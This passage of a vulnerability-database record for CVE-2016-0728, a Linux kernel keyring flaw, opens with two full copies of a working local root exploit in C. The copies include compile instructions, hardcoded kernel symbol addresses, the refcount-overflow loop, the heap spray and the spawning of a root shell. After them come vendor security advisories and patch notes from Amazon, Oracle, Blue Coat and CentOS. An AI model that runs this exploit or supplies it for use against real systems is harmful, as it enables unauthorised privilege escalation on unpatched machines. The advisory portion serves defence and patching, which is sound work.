CVE : CVE-2016-0728\n*/\n\n/* CVE-2016-0728 local root exploit\n modified by Federico Bento to read kernel symbols from /proc/kallsyms\n props to grsecurity/PaX for preventing this in so many ways\n\n $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall\n $ ./cve_2016_072 PP_KEY */\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <sys/types.h>\n#include <keyutils.h>\n#include <unistd.h>\n#include <time.h>\n#include <unistd.h>\n\n#include <sys/ipc.h>\n#include <sys/msg.h>\n\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\n_commit_creds commit_creds;\n_prepare_kernel_cred prepare_kernel_cred;\n\n#define STRUCT_LEN (0xb8 - 0x30)\n#define COMMIT_CREDS_ADDR (0xffffffff810bb050)\n#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370)\n\n\n\nstruct key_type {\n char * 
name;\n size_t datalen;\n void * vet_description;\n void * preparse;\n void * free_preparse;\n void * instantiate;\n void * update;\n void * match_preparse;\n void * match_free;\n void * revoke;\n void * destroy;\n};\n\n/* thanks spender - Federico Bento */\nstatic unsigned long get_kernel_sym(char *name)\n{\n FILE *f;\n unsigned long addr;\n char dummy;\n char sname[256];\n int ret;\n\n f = fopen(\"/proc/kallsyms\", \"r\");\n if (f == NULL) {\n fprintf(stdout, \"Unable to obtain symbol listing!\\n\");\n exit(0);\n }\n\n ret = 0;\n while(ret != EOF) {\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\n if (ret == 0) {\n fscanf(f, \"%s\\n\", sname);\n continue;\n }\n if (!strcmp(name, sname)) {\n fprintf(stdout, \"[+] Resolved %s to %p\\n\", name, (void *)addr);\n fclose(f);\n return addr;\n }\n }\n\n fclose(f);\n return 0;\n}\n\nvoid userspace_revoke(void * key) {\n commit_creds(prepare_kernel_cred(0));\n}\n\nint main(int argc, const char *argv[]) {\n const char *keyring_name;\n size_t i = 0;\n unsigned long int l = 0x100000000/2;\n key_serial_t serial = -1;\n pid_t pid = -1;\n struct key_type * my_key_type = NULL;\n\n struct {\n long mtype;\n char mtext[STRUCT_LEN];\n } msg = {0x4141414141414141, {0}};\n int msqid;\n\n if (argc != 2) {\n puts(\"usage: ./keys <key_name>\");\n return 1;\n }\n\n printf(\"[+] uid=%d, euid=%d\\n\", getuid(), geteuid());\n commit_creds = (_commit_creds)get_kernel_sym(\"commit_creds\");\n prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym(\"prepare_kernel_cred\");\n if(commit_creds == NULL || prepare_kernel_cred == NULL) {\n commit_creds = (_commit_creds)COMMIT_CREDS_ADDR;\n prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR;\n if(commit_creds == (_commit_creds)0xffffffff810bb050 || prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370)\n puts(\"[-] You probably need to change the address of commit_creds and prepare_kernel_cred in source\");\n }\n\n my_key_type = 
malloc(sizeof(*my_key_type));\n\n my_key_type->revoke = (void*)userspace_revoke;\n memset(msg.mtext, 'A', sizeof(msg.mtext));\n\n // key->uid\n *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */\n //key->perm\n *(int*)(&msg.mtext[64]) = 0x3f3f3f3f;\n\n //key->type\n *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;\n\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\n perror(\"msgget\");\n exit(1);\n }\n\n keyring_name = argv[1];\n\n /* Set the new session keyring before we start */\n\n serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);\n if (serial < 0) {\n perror(\"keyctl\");\n return -1;\n }\n\n if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {\n perror(\"keyctl\");\n return -1;\n }\n\n\n puts(\"[+] Increfing...\");\n for (i = 1; i < 0xfffffffd; i++) {\n if (i == (0xffffffff - l)) {\n l = l/2;\n sleep(5);\n }\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\n perror(\"[-] keyctl\");\n return -1;\n }\n }\n sleep(5);\n /* here we are going to leak the last references to overflow */\n for (i=0; i<5; ++i) {\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\n perror(\"[-] keyctl\");\n return -1;\n }\n }\n\n puts(\"[+] Finished increfing\");\n puts(\"[+] Forking...\");\n /* allocate msg struct in the kernel rewriting the freed keyring object */\n for (i=0; i<64; i++) {\n pid = fork();\n if (pid == -1) {\n perror(\"[-] fork\");\n return -1;\n }\n\n if (pid == 0) {\n sleep(2);\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\n perror(\"[-] msgget\");\n exit(1);\n }\n for (i = 0; i < 64; i++) {\n if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {\n perror(\"[-] msgsnd\");\n exit(1);\n }\n }\n sleep(-1);\n exit(1);\n }\n }\n\n puts(\"[+] Finished forking\");\n sleep(5);\n\n /* call userspace_revoke from kernel */\n puts(\"[+] Caling revoke...\");\n if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {\n perror(\"[+] keyctl_revoke\");\n 
}\n\n printf(\"uid=%d, euid=%d\\n\", getuid(), geteuid());\n execl(\"/bin/sh\", \"/bin/sh\", NULL);\n\n return 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (1)", "edition": 1, "published": "2016-01-19T00:00:00", "title": "Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (1)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-19T00:00:00", "id": "EXPLOITPACK:4CC02E891FC223E9BA1344151AC6958F", "href": "", "sourceData": "/*\n# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings\n# Date: 19/1/2016\n# Exploit Author: Perception Point Team\n# CVE : CVE-2016-0728\n*/\n\n/* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */\n/* $ ./cve_2016_072 PP_KEY */\n\n/* EDB-Note: More information ~ http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/ */\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <sys/types.h>\n#include <keyutils.h>\n#include <unistd.h>\n#include <time.h>\n#include <unistd.h>\n\n#include <sys/ipc.h>\n#include <sys/msg.h>\n\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\n_commit_creds commit_creds;\n_prepare_kernel_cred prepare_kernel_cred;\n\n#define STRUCT_LEN (0xb8 - 0x30)\n#define COMMIT_CREDS_ADDR (0xffffffff81094250)\n#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff81094550)\n\n\n\nstruct key_type {\n char * name;\n size_t datalen;\n void * vet_description;\n void * preparse;\n void * free_preparse;\n void * instantiate;\n void * update;\n void * match_preparse;\n void * match_free;\n void * revoke;\n void * destroy;\n};\n\nvoid userspace_revoke(void * 
key) {\n commit_creds(prepare_kernel_cred(0));\n}\n\nint main(int argc, const char *argv[]) {\n\tconst char *keyring_name;\n\tsize_t i = 0;\n unsigned long int l = 0x100000000/2;\n\tkey_serial_t serial = -1;\n\tpid_t pid = -1;\n struct key_type * my_key_type = NULL;\n \nstruct { long mtype;\n\t\tchar mtext[STRUCT_LEN];\n\t} msg = {0x4141414141414141, {0}};\n\tint msqid;\n\n\tif (argc != 2) {\n\t\tputs(\"usage: ./keys <key_name>\");\n\t\treturn 1;\n\t}\n\n printf(\"uid=%d, euid=%d\\n\", getuid(), geteuid()); \n commit_creds = (_commit_creds) COMMIT_CREDS_ADDR;\n prepare_kernel_cred = (_prepare_kernel_cred) PREPARE_KERNEL_CREDS_ADDR;\n \n my_key_type = malloc(sizeof(*my_key_type));\n\n my_key_type->revoke = (void*)userspace_revoke;\n memset(msg.mtext, 'A', sizeof(msg.mtext));\n\n // key->uid\n *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */\n //key->perm\n *(int*)(&msg.mtext[64]) = 0x3f3f3f3f;\n\n //key->type\n *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;\n\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\n perror(\"msgget\");\n exit(1);\n }\n\n keyring_name = argv[1];\n\n\t/* Set the new session keyring before we start */\n\n\tserial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);\n\tif (serial < 0) {\n\t\tperror(\"keyctl\");\n\t\treturn -1;\n }\n\t\n\tif (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {\n\t\tperror(\"keyctl\");\n\t\treturn -1;\n\t}\n\n\n\tputs(\"Increfing...\");\n for (i = 1; i < 0xfffffffd; i++) {\n if (i == (0xffffffff - l)) {\n l = l/2;\n sleep(5);\n }\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\n perror(\"keyctl\");\n return -1;\n }\n }\n sleep(5);\n /* here we are going to leak the last references to overflow */\n for (i=0; i<5; ++i) {\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\n perror(\"keyctl\");\n return -1;\n }\n }\n\n puts(\"finished increfing\");\n puts(\"forking...\");\n /* allocate msg struct in the kernel 
rewriting the freed keyring object */\n for (i=0; i<64; i++) {\n pid = fork();\n if (pid == -1) {\n perror(\"fork\");\n return -1;\n }\n\n if (pid == 0) {\n sleep(2);\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\n perror(\"msgget\");\n exit(1);\n }\n for (i = 0; i < 64; i++) {\n if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {\n perror(\"msgsnd\");\n exit(1);\n }\n }\n sleep(-1);\n exit(1);\n }\n }\n \n puts(\"finished forking\");\n sleep(5);\n\n /* call userspace_revoke from kernel */\n puts(\"caling revoke...\");\n if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {\n perror(\"keyctl_revoke\");\n }\n\n printf(\"uid=%d, euid=%d\\n\", getuid(), geteuid());\n execl(\"/bin/sh\", \"/bin/sh\", NULL);\n\n return 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:35:24", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "**Issue Overview:**\n\nPerception Point Research [identified](<http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/>) a use-after-free vulnerability, representing a local privilege escalation vulnerability in the Linux kernel. Their post contains a detailed analysis of the bug.\n\nkernel-4.1.13-19.30.amzn1 and earlier versions are impacted.\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum clean all_ followed by _yum update kernel_ to update your system. 
You will need to reboot your system in order for the new kernel to be running.\n\n \n\n\n**New Packages:**\n \n \n i686: \n kernel-tools-debuginfo-4.1.13-19.31.amzn1.i686 \n kernel-devel-4.1.13-19.31.amzn1.i686 \n kernel-headers-4.1.13-19.31.amzn1.i686 \n perf-debuginfo-4.1.13-19.31.amzn1.i686 \n kernel-tools-4.1.13-19.31.amzn1.i686 \n kernel-4.1.13-19.31.amzn1.i686 \n kernel-tools-devel-4.1.13-19.31.amzn1.i686 \n perf-4.1.13-19.31.amzn1.i686 \n kernel-debuginfo-common-i686-4.1.13-19.31.amzn1.i686 \n kernel-debuginfo-4.1.13-19.31.amzn1.i686 \n \n noarch: \n kernel-doc-4.1.13-19.31.amzn1.noarch \n \n src: \n kernel-4.1.13-19.31.amzn1.src \n \n x86_64: \n kernel-tools-4.1.13-19.31.amzn1.x86_64 \n perf-debuginfo-4.1.13-19.31.amzn1.x86_64 \n kernel-headers-4.1.13-19.31.amzn1.x86_64 \n kernel-tools-devel-4.1.13-19.31.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-4.1.13-19.31.amzn1.x86_64 \n kernel-tools-debuginfo-4.1.13-19.31.amzn1.x86_64 \n kernel-debuginfo-4.1.13-19.31.amzn1.x86_64 \n kernel-4.1.13-19.31.amzn1.x86_64 \n kernel-devel-4.1.13-19.31.amzn1.x86_64 \n perf-4.1.13-19.31.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2016-01-19T17:07:00", "published": "2016-01-19T17:07:00", "id": "ALAS-2016-642", "href": "https://alas.aws.amazon.com/ALAS-2016-642.html", "title": "Medium: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:01", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "kernel-uek\n[4.1.12-32.1.2]\n- KEYS: Fix keyring ref leak in join_session_keyring() (Yevgeny Pats) [Orabug: 22563965] {CVE-2016-0728}\n[4.1.12-32.1.1]\n- ocfs2: return non-zero st_blocks for inline data (John Haxby) [Orabug: 22218243] \n- xen/events/fifo: Consume unprocessed events when a CPU dies (Ross Lagerwall) [Orabug: 22498877] \n- Revert 'xen/fb: allow xenfb initialization for hvm guests' (Konrad Rzeszutek Wilk) \n- xen/pciback: Dont allow MSI-X ops if 
PCI_COMMAND_MEMORY is not set. (Konrad Rzeszutek Wilk) \n- xen/pciback: For XEN_PCI_OP_disable_msi[|x] only disable if device has MSI(X) enabled. (Konrad Rzeszutek Wilk) \n- xen/pciback: Do not install an IRQ handler for MSI interrupts. (Konrad Rzeszutek Wilk) \n- xen/pciback: Return error on XEN_PCI_OP_enable_msix when device has MSI or MSI-X enabled (Konrad Rzeszutek Wilk) \n- xen/pciback: Return error on XEN_PCI_OP_enable_msi when device has MSI or MSI-X enabled (Konrad Rzeszutek Wilk) \n- xen/pciback: Save xen_pci_op commands before processing it (Konrad Rzeszutek Wilk) \n- xen-scsiback: safely copy requests (David Vrabel) \n- xen-blkback: read from indirect descriptors only once (Roger Pau Monne) \n- xen-blkback: only read request operation from shared ring once (Roger Pau Monne) \n- xen-netback: use RING_COPY_REQUEST() throughout (David Vrabel) \n- xen-netback: dont use last request to determine minimum Tx credit (David Vrabel) \n- xen: Add RING_COPY_REQUEST() (David Vrabel)", "edition": 4, "modified": "2016-01-20T00:00:00", "published": "2016-01-20T00:00:00", "id": "ELSA-2016-3510", "href": "http://linux.oracle.com/errata/ELSA-2016-3510.html", "title": "kernel-uek security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "[3.10.0-327.4.5.OL7]\n- Oracle Linux certificates (Alexey Petrenko)\n[3.10.0-327.4.5]\n- [security] keys: Fix keyring ref leak in join_session_keyring() (David Howells) [1298931 1298036] {CVE-2016-0728}", "edition": 4, "modified": "2016-01-25T00:00:00", "published": "2016-01-25T00:00:00", "id": "ELSA-2016-0064", "href": "http://linux.oracle.com/errata/ELSA-2016-0064.html", "title": "kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:59", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], 
"description": "kernel-uek\n[3.8.13-118.2.5]\n- KEYS: Fix keyring ref leak in join_session_keyring() (Yevgeny Pats) [Orabug: 22563965] {CVE-2016-0728}", "edition": 4, "modified": "2016-01-20T00:00:00", "published": "2016-01-20T00:00:00", "id": "ELSA-2016-3509", "href": "http://linux.oracle.com/errata/ELSA-2016-3509.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:47", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7872", "CVE-2016-0728", "CVE-2015-5157"], "description": "- [3.10.0-327.10.1.OL7]\n- Oracle Linux certificates (Alexey Petrenko)\n[3.10.0-327.10.1]\n- [of] return NUMA_NO_NODE from fallback of_node_to_nid() (Thadeu Lima de Souza Cascardo) [1300614 1294398]\n- [net] openvswitch: do not allocate memory from offline numa node (Thadeu Lima de Souza Cascardo) [1300614 1294398]\n[3.10.0-327.9.1]\n- [security] keys: Fix keyring ref leak in join_session_keyring() (David Howells) [1298931 1298036] {CVE-2016-0728}\n[3.10.0-327.8.1]\n- [md] dm: fix AB-BA deadlock in __dm_destroy() (Mike Snitzer) [1296566 1292481]\n- [md] revert 'dm-mpath: fix stalls when handling invalid ioctls' (Mike Snitzer) [1287552 1277194]\n- [cpufreq] intel_pstate: Fix limits->max_perf rounding error (Prarit Bhargava) [1296276 1279617]\n- [cpufreq] intel_pstate: Fix limits->max_policy_pct rounding error (Prarit Bhargava) [1296276 1279617]\n- [cpufreq] revert 'intel_pstate: fix rounding error in max_freq_pct' (Prarit Bhargava) [1296276 1279617]\n- [crypto] nx: 842 - Add CRC and validation support (Gustavo Duarte) [1289451 1264905]\n- [powerpc] eeh: More relaxed condition for enabled IO path (Steve Best) [1289101 1274731]\n- [security] keys: Don't permit request_key() to construct a new keyring (David Howells) [1275929 1273465] {CVE-2015-7872}\n- [security] keys: Fix crash when attempt to garbage collect an uninstantiated keyring (David Howells) [1275929 
1273465] {CVE-2015-7872}\n- [security] keys: Fix race between key destruction and finding a keyring by name (David Howells) [1275929 1273465] {CVE-2015-7872}\n- [x86] paravirt: Replace the paravirt nop with a bona fide empty function (Mateusz Guzik) [1259582 1259583] {CVE-2015-5157}\n- [x86] nmi: Fix a paravirt stack-clobbering bug in the NMI code (Mateusz Guzik) [1259582 1259583] {CVE-2015-5157}\n- [x86] nmi: Use DF to avoid userspace RSP confusing nested NMI detection (Mateusz Guzik) [1259582 1259583] {CVE-2015-5157}\n- [x86] nmi: Reorder nested NMI checks (Mateusz Guzik) [1259582 1259583] {CVE-2015-5157}\n- [x86] nmi: Improve nested NMI comments (Mateusz Guzik) [1259582 1259583] {CVE-2015-5157}\n- [x86] nmi: Switch stacks on userspace NMI entry (Mateusz Guzik) [1259582 1259583] {CVE-2015-5157}\n[3.10.0-327.7.1]\n- [scsi] scsi_sysfs: protect against double execution of __scsi_remove_device() (Vitaly Kuznetsov) [1292075 1273723]\n- [powerpc] mm: Recompute hash value after a failed update (Gustavo Duarte) [1289452 1264920]\n- [misc] genwqe: get rid of atomic allocations (Hendrik Brueckner) [1289450 1270244]\n- [mm] use only per-device readahead limit (Eric Sandeen) [1287550 1280355]\n- [net] ipv6: update ip6_rt_last_gc every time GC is run (Hannes Frederic Sowa) [1285370 1270092]\n- [kernel] tick: broadcast: Prevent livelock from event handler (Prarit Bhargava) [1284043 1265283]\n- [kernel] clockevents: Serialize calls to clockevents_update_freq() in the core (Prarit Bhargava) [1284043 1265283]\n[3.10.0-327.6.1]\n- [netdrv] bonding: propagate LRO disable to slave devices (Jarod Wilson) [1292072 1266578]\n[3.10.0-327.5.1]\n- [net] vsock: Fix lockdep issue (Dave Anderson) [1292372 1253971]\n- [net] vsock: sock_put wasn't safe to call in interrupt context (Dave Anderson) [1292372 1253971]", "edition": 4, "modified": "2016-02-16T00:00:00", "published": "2016-02-16T00:00:00", "id": "ELSA-2016-0185", "href": "http://linux.oracle.com/errata/ELSA-2016-0185.html", "title": 
"kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2020-12-24T10:41:40", "bulletinFamily": "software", "cvelist": ["CVE-2016-0728"], "description": "### SUMMARY\n\nBlue Coat products that include affected versions of the Linux kernel and provide means for executing arbitrary code are susceptible to a privilege escalation vulnerability. A malicious local unprivileged user can exploit this vulnerability to escalate their privileges on the system or cause denial of service. \n \n\n\n### AFFECTED PRODUCTS\n\n**Malware Analysis (MA)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-0728 | 4.2 | Upgrade to 4.2.9. \n \n \n\n**Norman Shark Industrial Control System Protection (ICSP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-0728 | 5.4 | Not vulnerable, fixed in 5.4.1 \n5.3 | Upgrade to 5.3.6. \n \n \n\n**Norman Shark Network Protection (NNP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-0728 | 5.3 | Upgrade to 5.3.6. \n \n \n\n**Norman Shark SCADA Protection (NSP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-0728 | 5.3 | Upgrade to 5.3.6. \n \n \nThe following products have a vulnerable version of the Linux kernel, but are not vulnerable to known vectors of attack:\n\n**Advanced Secure Gateway (ASG)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-0728 \n | 6.7 and later | Not vulnerable, fixed in 6.7.2.1 \n6.6 | Upgrade to 6.6.5.1. \n \n \n\n**Content Analysis System (CAS)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \n CVE-2016-0728 \n \n | 2.1 and later | Not vulnerable, fixed in 2.1.1.1 \n1.3 | Upgrade to 1.3.7.1. \n1.2 | Upgrade to later releases with fixes. 
\n \n \n\n**Mail Threat Defense (MTD)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-0728 | 1.1 | Not available at this time \n \n \n\n**Management Center (MC)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-0728 \n | 1.7 and later | Not vulnerable, fixed in 1.7.1.2. \n1.6 | Upgrade to later releases with fixes. \n1.5 | Upgrade to later releases with fixes. \n \n \n\n**Reporter** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-0728 | 10.2 and later | Not vulnerable, fixed in 10.2.1.1 \n10.1 | Upgrade to 10.1.4.2. \n \n \n\n**SSL Visibility (SSLV)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-0728 \n \n \n | 3.10 and later | Not vulnerable, fixed in 3.10.1.1 \n3.9 | Upgrade to 3.9.4.1. \n3.8.4FC | Upgrade to later releases with fixes. \n3.8 | Upgrade to later releases with fixes. \n \n### \nADDITIONAL PRODUCT INFORMATION\n\nA Blue Coat product does not need to use the Linux keyring facility in order to be vulnerable. A malicious local unprivileged user can execute arbitrary code that uses the keyctl() system call to exploit the vulnerability and gain escalated privileges on the system or cause denial of service. A remote attacker has to either have shell access on the target system, or force the target system to execute arbitrary code to exploit this vulnerability.\n\nBlue Coat products that use a native installation of the Linux kernel but do not install or maintain the kernel are not vulnerable to this attack. However, the underlying platform that installs and maintains the Linux kernel may be vulnerable. Blue Coat urges our customers to update the versions of the Linux kernel that are natively installed for Client Connector, ProxyClient, and Reporter 9.x for Linux.\n\nBlue Coat products that do not provide Linux shell access and do not execute arbitrary code from untrusted sources are not known to be vulnerable to this attack. 
However, vulnerability fixes will be included in the patches that are provided. The following products include vulnerable versions of the Linux kernel, but do not provide Linux shell access, do not execute arbitrary code from untrusted sources, and are not known to be vulnerable:\n\n * **ASG**\n * **CAS**\n * **MTD**\n * **MC**\n * **Reporter 10.1**\n * **SSLV**\n\nThe following products are not vulnerable: \n**Android Mobile Agent \nAuthConnector \nBCAAA \nBlue Coat HSM Agent for the Luna SP \nCacheFlow \nClient Connector \nCloud Data Protection for Salesforce \nCloud Data Protection for Salesforce Analytics \nCloud Data Protection for ServiceNow \nCloud Data Protection for Oracle CRM On Demand \nCloud Data Protection for Oracle Field Service Cloud \nCloud Data Protection for Oracle Sales Cloud \nCloud Data Protection Integration Server \nCloud Data Protection Communication Server \nCloud Data Protection Policy Builder \nDirector \nGeneral Auth Connector Login Application \nIntelligenceCenter \nIntelligenceCenter Data Collector \nK9 \nPacketShaper \nPacketShaper S-Series \nPolicyCenter \nPolicyCenter S-Series \nProxyAV \nProxyAV ConLog and ConLogXP \nProxyClient \nProxySG \nSecurity Analytics \nUnified Agent \nWeb Isolation \nX-Series XOS**\n\nBlue Coat no longer provides vulnerability information for the following products:\n\n**DLP** \nPlease, contact Digital Guardian technical support regarding vulnerability information for DLP. \n \n\n\n### ISSUES\n\nThis Security Advisory addresses a privilege escalation vulnerability in the Linux kernel (CVE-2016-0728). A malicious local unprivileged user can exploit a reference leak and use-after-free flaw in the Linux kernel keyring facility. 
The malicious user can exploit the leaked keyring reference to cause the Linux kernel to execute arbitrary code, resulting in privilege escalation or denial of service.\n\nThe Linux kernel keyring facility is a mechanism for Linux drivers to cache authentication keys, encryption keys, and other security-related objects in the Linux kernel. Linux provides a system call interface, including a keyctl() system call, for userspace applications to manage the kernel objects and also use the keyring facility for their own purposes. \n\n**CVE-2016-0728\u200b** \n--- \n**Severity / CVSSv2** | High / 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C) \n**References** | SecurityFocus: [BID 81054](<https://www.securityfocus.com/bid/81054>) / NVD: [CVE-2016-0728](<https://nvd.nist.gov/vuln/detail/CVE-2016-0728>) \n**Impact** | Privilege escalation \n**Description** | Blue Coat products that include affected versions of the Linux kernel and provide means for executing arbitrary code are susceptible to a privilege escalation vulnerability. \n \n### \nREFERENCES\n\nAnalysis and Exploitation of a Linux Kernel Vulnerability (from Perception Point) - <https://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/>\n\n \n\n### REVISION\n\n2020-04-20 Advisory status moved to Closed. \n2019-10-03 Web Isolation is not vulnerable. \n2018-09-24 A fix for SSLV 3.8.4FC will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2017-11-06 ASG 6.7 is not vulnerable. \n2017-08-02 SSLV 4.1 is not vulnerable. \n2017-07-20 MC 1.10 is not vulnerable. \n2017-05-17 CAS 2.1 is not vulnerable. \n2017-03-30 MC 1.9 is not vulnerable. \n2017-03-06 MC 1.8 is not vulnerable. ProxySG 6.7 is not vulnerable. SSLV 4.0 is not vulnerable. Vulnerability inquiries for DLP should be addressed to Digital Guardian technical support. \n2016-12-04 SSLV 3.11 is not vulnerable. \n2016-11-17 Cloud Data Protection for Oracle Field Service Cloud is not vulnerable. 
\n2016-11-11 SSLV 3.10 is not vulnerable. \n2016-11-04 A fix for ASG is available in 6.6.5.1. A fix for Reporter 10.1 is available in 10.1.4.2. \n2016-10-25 MC 1.6 has a vulnerable version of the Linux kernel, but is not vulnerable to known vectors of attack. MC 1.7 is not vulnerable because it contains the vulnerability fix. \n2016-08-12 A fix for CAS 1.3 is available in 1.3.7.1. \n2016-08-10 A fix for SSLV 3.9 is available in 3.9.4.1. \n2016-06-13 Fixes for ICSP, NNP, and NSP are available in 5.3.6. \n2016-06-03 A fix for MAA is available in 4.2.9. \n2016-05-12 A fix for SSLV 3.8 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2016-05-11 No Cloud Data Protection products are vulnerable. \n2016-04-25 MTD 1.1 has a vulnerable version of the Linux kernel, but is not vulnerable to known vectors of attack. \n2016-04-15 A fix will not be provided for CAS 1.2. Please upgrade to a later version with the vulnerability fixes. \n2016-02-25 initial public release\n", "modified": "2020-04-21T03:57:57", "published": "2016-02-25T08:00:00", "id": "SMNTC-1349", "href": "", "type": "symantec", "title": "SA112 : Linux Kernel Keyring Privilege Escalation", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:27:06", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "**CentOS Errata and Security Advisory** CESA-2016:0064\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in certain\nerror path of the join_session_keyring() function. 
A local, unprivileged\nuser could use this flaw to escalate their privileges on the system.\n(CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for\nreporting this issue.\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. The system must be\nrebooted for this update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-January/033663.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-tools\nkernel-tools-libs\nkernel-tools-libs-devel\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-0064.html", "edition": 3, "modified": "2016-01-26T02:08:06", "published": "2016-01-26T02:08:06", "href": "http://lists.centos.org/pipermail/centos-announce/2016-January/033663.html", "id": "CESA-2016:0064", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:41", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "It was reported that possible use-after-free vulnerability in keyring\nfacility, possibly leading to local privilege escalation, was found.\nFunction 